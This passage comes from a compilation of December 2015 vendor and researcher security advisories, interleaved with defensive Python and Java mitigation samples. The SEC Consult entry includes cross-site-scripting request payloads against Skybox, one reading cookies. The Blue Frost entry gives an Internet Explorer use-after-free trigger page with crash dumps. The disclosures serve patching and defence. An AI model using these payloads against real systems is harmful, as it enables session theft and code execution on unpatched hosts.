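"""

# The two preferences the bulletin says to set to false.
DHE_PREFS = (
    "security.ssl3.dhe_rsa_aes_128_sha",
    "security.ssl3.dhe_rsa_aes_256_sha",
)

# Matches pref("name", value); and user_pref("name", value); with a boolean,
# integer or quoted-string value, one per line.
PREF_RE = re.compile(
    r'^\s*(?:user_)?pref\("([^"]+)",\s*(true|false|-?\d+|"[^"]*")\);', re.M
)


def parse_prefs(text):
    """Parse pref()/user_pref() lines into a dict with typed values."""
    prefs = {}
    for name, raw in PREF_RE.findall(text):
        if raw == "true":
            value = True
        elif raw == "false":
            value = False
        elif raw.startswith('"'):
            value = raw[1:-1]
        else:
            value = int(raw)
        prefs[name] = value
    return prefs


def dhe_still_enabled(prefs, default=True):
    """Names of the DHE preferences that are still true.

    A preference missing from prefs.js keeps the build default. The affected
    releases ship these suites enabled, so absent is treated as enabled
    (assumption; pass default=False for a build known to disable them)."""
    return [name for name in DHE_PREFS if prefs.get(name, default)]


def render_fix(names):
    """user.js lines that force the given preferences off on next start."""
    return "\n".join('user_pref("%s", false);' % name for name in names)


if __name__ == "__main__":
    todo = dhe_still_enabled(parse_prefs(SAMPLE_PREFS_JS))
    print(render_fix(todo) if todo else "DHE suites already disabled")
```

Writing the output into user.js rather than editing prefs.js directly is deliberate: prefs.js is rewritten by the application on exit, while user.js is re-applied at every start, so the mitigation survives the next session.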
Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability Advisory ID: cisco-sa-20151209-pca Revision 1.0 For Public Release 2015 December 9 16:00 UTC (GMT) +- Summary === A vulnerability in Cisco Prime Collaboration Assurance (PCA) Software could allow an unauthenticated, remote attacker to log in to the system shell with the default cmuser user account and access the shell with a limited set of permissions. The vulnerability is due to an undocumented account that has a default and static password. This account is created during installation and cannot be changed or deleted without impacting the functionality of the system. The first time this account is used the system will request that the user change the default password. An attacker could exploit this vulnerability by remotely connecting to the affected system via SSH by using the undocumented account. Successful exploitation could allow the attacker to access the system with the privileges of the cmuser user. This vulnerability allows the attacker to: access some sensitive data, such as the password file, system logs, and Cisco PCA database information; modify some data; run some internal executables; and potentially make the system unstable or inaccessible. Cisco has released software updates that address this vulnerability. Workarounds are available. 
This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-pca -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJWaCspAAoJEIpI1I6i1Mx3z2MP/381uF5+mIQ0mw/T3wLa3BIF q+N8NG6ZlIZuQS8gtKwI9Ywl2K1GKgyyPdugsZ4lLli0Trp2tX7V8VoifX2vFGD4 nHk7/vEAVCQ8p3SZtO13ObgHOYVfAYjtm2ijSxEZYbcsM21zMnV9551edr1XCgNp MbIoUnhWzepO3ps6neirtN5ye7np7iPXiGrH98tAW6OxCZ16VOEp6tQPEzyXTHRz 8cS466q/xiltGiknANP/R4IY1L7vVAF8+mksJaFpjXsr6jBHhDFBCic1kPkJSUno SWfDz8vCu9DfzraaR4/x9madU5qcZRElpJUPsH0LKFAdGTSD80OiYpHbK9HcdoWI KafzzlNnA5iocE4I3vrxEG/hCwwbjj47XMY7mlVW46MJeopzoA71t7jF9KFpyJJs xsz9rORMXcswU46ZC+rwDiUTBBpreOJJCe8WCLzhepn1LRrJyvmTSQqzHTcpK2xA JNos6kMSU1xWIJe2J/7hqKU5VbPXGHuARI4wpatzGsSFLS9THCxrcBj43Gfd8zo/ PLR4ipJVenbBRQjEpxPTGDUltkMrdmB84iN8mB2IcfkrUXfMR6hRZijhRwcq2cVu iByoDe9Zn5H5pYbSMUXM2cNVGf+AuNYFB/CUoULC5JrKMq+1JUt4lsyL1NIC5JeR HfD0Xf/4bKhC8z2kBLAe =O1HB -END PGP SIGNATURE-
APPLE-SA-2015-12-08-4 watchOS 2.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-4 watchOS 2.1 watchOS 2.1 is now available and addresses the following: AppSandbox Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Compression Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru CoreGraphics Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of malformed media files. This issue was addressed through improved memory handling. 
CVE-ID CVE-2015-7075 dyld Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A segment validation issue existed in dyld. This was addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple FontParser Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative GasGauge Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6979 : PanguTeam ImageIO Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOHIDFamily Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling. 
CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation. CVE-ID CVE-2015-7068 : Ian Beer of Google Project Zero Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-ID CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7043 : Tarjei Mandt (@kernelpool) Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local user may be able to execute arbitrary code with kernel privileges Description: An issue existed in the parsing of mach messages. This issue was addressed through improved validation of mach messages. CVE-ID CVE-2015-7047 : Ian Beer of Google
[SECURITY] [DSA 3414-1] xen security update
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Debian Security Advisory DSA-3414-1                   secur...@debian.org
https://www.debian.org/security/                      Moritz Muehlenhoff
December 09, 2015                           https://www.debian.org/security/faq

Package        : xen
CVE ID         : CVE-2015-3259 CVE-2015-3340 CVE-2015-5307 CVE-2015-6654 CVE-2015-7311 CVE-2015-7812 CVE-2015-7813 CVE-2015-7814 CVE-2015-7969 CVE-2015-7970 CVE-2015-7971 CVE-2015-7972 CVE-2015-8104

Multiple security issues have been found in the Xen virtualisation solution, which may result in denial of service or information disclosure.

For the oldstable distribution (wheezy), an update will be provided later.

For the stable distribution (jessie), these problems have been fixed in version 4.4.1-9+deb8u3.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your xen packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability
== Secunia Research 08/12/2015

Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability

== Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

== 1) Affected Software

* Microsoft Windows 7
* Microsoft Windows Server 2008

== 2) Severity

Rating: Highly critical
Impact: System Access
Where: From remote

== 3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an integer underflow error within the "GetFontDesc()" function in usp10.dll when processing a font file's cmap table. It can be exploited to cause a heap-based buffer overflow via a font file whose cmap table contains an encoding record with a specially crafted offset.

Successful exploitation allows execution of arbitrary code.

== 4) Solution

Apply the update provided by MS15-130.

== 5) Time Table

09/10/2015 - Vendor notified.
12/10/2015 - Vendor response.
17/10/2015 - Status update provided by the vendor.
28/10/2015 - Vendor provides December 2015 as intended fix date.
08/12/2015 - Release of vendor patch and public disclosure.

== 6) Credits

Discovered by Hossein Lotfi, Secunia Research (now part of Flexera Software).

== 7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-6130 identifier for the vulnerability.
== 8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software: https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals who are interested in or concerned about IT security: http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to help improve the security and reliability of software in general: http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/

== 9) Verification

Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-6/

Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/

==
APPLE-SA-2015-12-08-6 Xcode 7.2
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-6 Xcode 7.2

Xcode 7.2 is now available and addresses the following:

Git
Available for: OS X Yosemite v10.10.5 or later
Impact: Multiple vulnerabilities existed in Git
Description: Multiple vulnerabilities existed in Git versions prior to 2.5.4. These were addressed by updating Git to version 2.5.4.
CVE-ID
CVE-2015-7082

IDE SCM
Available for: OS X Yosemite v10.10.5 or later
Impact: Intentionally untracked files may be uploaded to repositories
Description: Xcode did not honor the .gitignore directive. This issue was addressed by adding support for honoring the .gitignore file.
CVE-ID
CVE-2015-7056 : Stephen Lardieri

otools
Available for: OS X Yosemite v10.10.5 or later
Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in the processing of mach-o files. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7049 : Proteas of Qihoo 360 Nirvan Team
CVE-2015-7057 : Proteas of Qihoo 360 Nirvan Team

Installation note:

Xcode 7.2 may be obtained from: https://developer.apple.com/xcode/downloads/

To check that Xcode has been updated:

* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "7.2".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products

Advisory ID: cisco-sa-20151209-java-deserialization
Revision 1.0
For Public Release: 2015 December 9 16:00 GMT

Summary
===

A vulnerability in the Java deserialization used by the Apache Commons Collections (ACC) library could allow an unauthenticated, remote attacker to execute arbitrary code.

The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by submitting crafted input to an application on a targeted system that uses the ACC library. After the vulnerable library on the affected system deserializes the content, the attacker could execute arbitrary code on the system, which could be used to conduct further attacks.

On November 6, 2015, Foxglove Security Group published information about a remote code execution vulnerability that affects multiple releases of the ACC library. The report contains detailed proof-of-concept code for a number of applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, and WebLogic. This is a remotely exploitable vulnerability that allows an attacker to inject any malicious code or execute any commands that exist on the server. A wide range of potential impacts includes allowing the attacker to obtain sensitive information.

Object serialization is a technique that many programming languages use to convert an object into a sequence of bits for transfer purposes. Deserialization is the technique that reassembles those bits back into an object. This vulnerability occurs when Java objects are serialized for network transport and deserialized on the receiving side: many applications accept serialized objects from the network without performing any input validation before deserializing them, so a crafted serialized object can lead to execution of arbitrary attacker-supplied code.
Although the problem itself is in the serialization and deserialization functionality of the Java programming language, the ACC library is known to be affected by this vulnerability. Any application or application framework could be vulnerable if it uses the ACC library and deserializes arbitrary, user-supplied Java serialized data.

Additional details about the vulnerability are available at the following links:

Official Vulnerability Note from CERT: http://www.kb.cert.org/vuls/id/576313
Foxglove Security: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Apache Commons Statement: https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread
Oracle Security Alert: https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852

Cisco will release software updates that address this vulnerability. There are no workarounds that mitigate this vulnerability.

This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization
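The advisory's root cause is a receiver that resolves and instantiates whatever classes an untrusted stream names. The defensive pattern for application code that must deserialize such data, shown here as an added example that is not Cisco, Apache or Foxglove code, is an ObjectInputStream subclass that enforces a class allow-list in resolveClass(), so an unexpected class (a HashMap stands in for any gadget chain) is rejected before it is even loaded. The SafeDeserialization class, the StatusReport message type and the allow-list contents are assumptions of the example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.Collections;
import java.util.Set;
// Added example (not Cisco, Apache or Foxglove code). Gadget chains such as the
// Apache Commons Collections chain work because the receiver resolves library
// classes it never meant to accept; an allow-list enforced in resolveClass()
// stops that resolution before any code of the foreign class can run.
public class SafeDeserialization {
    // Hypothetical message type this receiver legitimately expects.
    public static final class StatusReport implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String host;
        public final int load;
        public StatusReport(String host, int load) {
            this.host = host;
            this.load = load;
        }
    }

    // The complete set of classes an untrusted stream may contain. Strings and
    // primitives are encoded inline and never pass through resolveClass().
    private static final Set<String> ALLOWED =
            Collections.singleton(StatusReport.class.getName());

    // ObjectInputStream that refuses to resolve any class not on the list.
    static final class AllowListObjectInputStream extends ObjectInputStream {
        AllowListObjectInputStream(byte[] data) throws IOException {
            super(new ByteArrayInputStream(data));
        }
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                // Rejected at the class descriptor: the class is not loaded and
                // no readObject()/readResolve() of it executes. On Java 9+ the
                // built-in ObjectInputFilter (JEP 290) can enforce the same policy.
                throw new InvalidClassException(desc.getName(),
                        "class not permitted in untrusted stream");
            }
            return super.resolveClass(desc);
        }
    }

    // Plain Java serialization, as any sender (trusted or not) would produce it.
    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Entry point for bytes received from the network.
    public static Object deserializeUntrusted(byte[] data)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new AllowListObjectInputStream(data)) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the expected message type is accepted.
        StatusReport r = (StatusReport) deserializeUntrusted(
                serialize(new StatusReport("db-01", 42)));
        System.out.println("accepted: " + r.host + " load=" + r.load);

        // Constructed sample: a HashMap stands in for any object graph the
        // receiver did not expect; a real gadget chain is rejected the same way.
        try {
            deserializeUntrusted(serialize(new java.util.HashMap<String, String>()));
            System.out.println("BUG: unexpected class was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allow-list must name every class that can legitimately appear in the stream, including nested field types, or valid messages will be rejected; that is the intended failure direction for a receiver on an untrusted network boundary.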
APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

OS X El Capitan 10.11.2 and Security Update 2015-008 is now available and addresses the following:

apache_mod_php
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.29, the most serious of which may have led to remote code execution. These were addressed by updating PHP to version 5.5.30.
CVE-ID
CVE-2015-7803
CVE-2015-7804

AppSandbox
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A malicious application may maintain access to Contacts after having access revoked
Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt

Bluetooth
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A local user may be able to execute arbitrary code with system privileges
Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7108 : Ian Beer of Google Project Zero

CFNetwork HTTPProtocol
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: An attacker with a privileged network position may be able to bypass HSTS
Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and Muneaki Nishimura (nishimunea)

Compression
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

Configuration Profiles
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A local attacker may be able to install a configuration profile without admin privileges
Description: An issue existed when installing configuration profiles. This issue was addressed through improved authorization checks.
CVE-ID
CVE-2015-7062 : David Mulder of Dell Software

CoreGraphics
Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

Disk Images
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A local user may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7110 : Ian Beer of Google Project Zero

EFI
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A local user may be able to execute arbitrary code with system privileges
Description: A path validation issue existed in the kernel loader. This was addressed through improved environment sanitization.
CVE-ID
CVE-2015-7063 : Apple

File Bookmark
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A sandboxed process may be able to circumvent sandbox restrictions
Description: A path validation issue existed in app scoped bookmarks. This was addressed through improved environment sanitization.
CVE-ID
CVE-2015-7071 : Apple

Hypervisor
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: A local user may be able to execute arbitrary code with system privileges
Description: A use after free issue existed in the handling of VM objects. This issue was addressed through improved memory management.
CVE-ID
CVE-2015-7078 : Ian Beer of Google Project Zero

iBooks
Available for: OS X El Capitan v10.11 and v10.11.1
Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information
Description: An XML external entity reference issue existed with iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and
SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
===
title: Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
CVE number:
impact: Critical
homepage: www.skyboxsecurity.com/products/appliance
found: 2014-12-04
by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
===

Vendor description:
---
"Skybox Security provides cutting-edge risk analytics for enterprise security management. Our solutions give you complete network visibility, help you eliminate attack vectors, and optimize your security management processes. Protect the network and the business."

Source: http://www.skyboxsecurity.com/

Business recommendation:
---
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks against the Skybox platform. Furthermore, it is possible for unauthenticated attackers to download arbitrary files and execute arbitrary code.

SEC Consult recommends that the vendor conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Skybox platform and increase the security of its customers.

Vulnerability overview/description:
---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution

Proof of concept:
---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities

Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the service VersionRepositoryWebService:

POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863

http://schemas.xmlsoap.org/soap/envelope/; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/; xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85 t;a xmlns:a=http://www.w3.org/1999/xhtmla:body onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601

Other scripts and parameters, such as the parameter status of the login script (located at https://localhost:444/login.html), are affected as well. The following request demonstrates this issue:

https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities

Multiple fields of the Skybox Change Manager, which can be accessed at https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting attacks. For example, when creating a new ticket, the title can be misused to insert JavaScript code. The following request to the server demonstrates the issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]

7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.gwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.transfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phases.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.view.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItemId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/852682809||skyboxview|test">|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability

Skybox Change Manager allows uploading and downloading attachments for tickets. The download functionality can be exploited to download arbitrary files. No authentication is required to exploit this vulnerability.
BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/
research(at)bluefrostsecurity.de

BFS-SA-2015-003
10-December-2015

Vendor: Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version: IE 11
Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152

I. Impact

This vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

II. Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:

small{ -ms-block-progression: lr; -ms-filter: "vv"; } function trigger() { document.execCommand("JustifyLeft"); } bluefrost security trigger();

With page heap enabled and the Memory Protect feature turned off, visiting that page results in the following crash:

(2d4.830): Access violation - code c005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx= edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f740240300 test dword ptr [eax+24h],3h ds:002b:09b09eb4=

0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04: 9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x00c2
77e61b1c ntdll!RtlDebugFreeHeap+0x002f
77e1ae8a ntdll!RtlpFreeHeap+0x005d
77dc2b65 ntdll!RtlFreeHeap+0x0142
758814ad kernel32!HeapFree+0x0014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023
6dfce0db MSHTML!CElement::PrivateRelease+0x027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b
6d95577e MSHTML!GlobalWndProc+0x012e
770762fa user32!InternalCallWinProc+0x0023
77076d3a user32!UserCallWinProcCheckWow+0x0109
770777c4 user32!DispatchMessageWorker+0x03bc
7707788a user32!DispatchMessageW+0x000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094
7588336a kernel32!BaseThreadInitThunk+0x000e
77dc9882 ntdll!__RtlUserThreadStart+0x0070
77dc9855 ntdll!_RtlUserThreadStart+0x001b

We can see that a freed CObjectElement object is accessed in the MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the memory just before the CObjectElement destructor is called, we can see where the object was initially allocated.
0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx= ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0287
MSHTML!CObjectElement::~CObjectElement:

0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
9b01f04: 9b09e90 170 - 9b09000 2000
MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229
77e6134e ntdll!RtlDebugAllocateHeap+0x0030
77e1b16e ntdll!RtlpAllocateHeap+0x00c4
77dc2fe3 ntdll!RtlAllocateHeap+0x023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8
6df17172 MSHTML!CHtmParse::ParseToken+0x0096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7
6dd8341b MSHTML!CHtmPost::Exec+0x0207
